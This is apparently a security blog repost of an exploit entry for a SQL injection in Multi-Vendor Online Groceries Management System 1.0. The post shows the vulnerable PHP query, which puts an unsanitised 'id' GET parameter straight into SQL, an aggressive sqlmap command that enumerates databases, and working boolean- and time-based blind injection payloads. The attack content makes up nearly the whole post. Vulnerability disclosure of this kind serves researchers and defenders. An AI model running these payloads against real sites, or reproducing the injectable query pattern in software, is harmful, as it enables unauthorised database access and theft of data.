Tuesday, March 28, 2023
Latest:

RealinfoSec.Net

InfoSec News, Cybersecurity Awareness

Vulnerabilities 

Multi-Vendor Online Groceries Management System 1.0 – ‘id’ Blind SQL Injection

RiSec.n0tst3 0 Comments Blind SQL Injection, cybersecurity, exploit, infosecurity, Multi-vendor, SQLi
# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10


# Vulnerable Code

line 2 in file "mvogms/products/view_product.php

$qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");

# Sqlmap command:

sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch

# Output:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=products/view_product&id=3' AND 9973=9973-- ogag

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ
Bookmark
Social Comments Box
Connect
RiSec.n0tst3
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK.

I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated...

I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK.

I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!
Connect
Latest posts by RiSec.n0tst3 (see all)
Recommended:  Three Plugins with Same Bug Put 84K WordPress Sites at Risk
Share the word, let's increase Cybersecurity Awareness as we know it

RiSec.n0tst3

Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

You May Also Like

Adobe Issues an Emergency Patch to Address an Exploited Commerce Zero-Day Vulnerability

RiSec.n0tst3 0

HotelDruid RCE (Remote Code Execution) V3.0.3

RiSec.n0tst3 0
lmssql

WordPress Good LMS 2.1.4 SQL Injection Vulnerability

RiSec.Mitch 0

Leave a Reply

Your email address will not be published. Required fields are marked *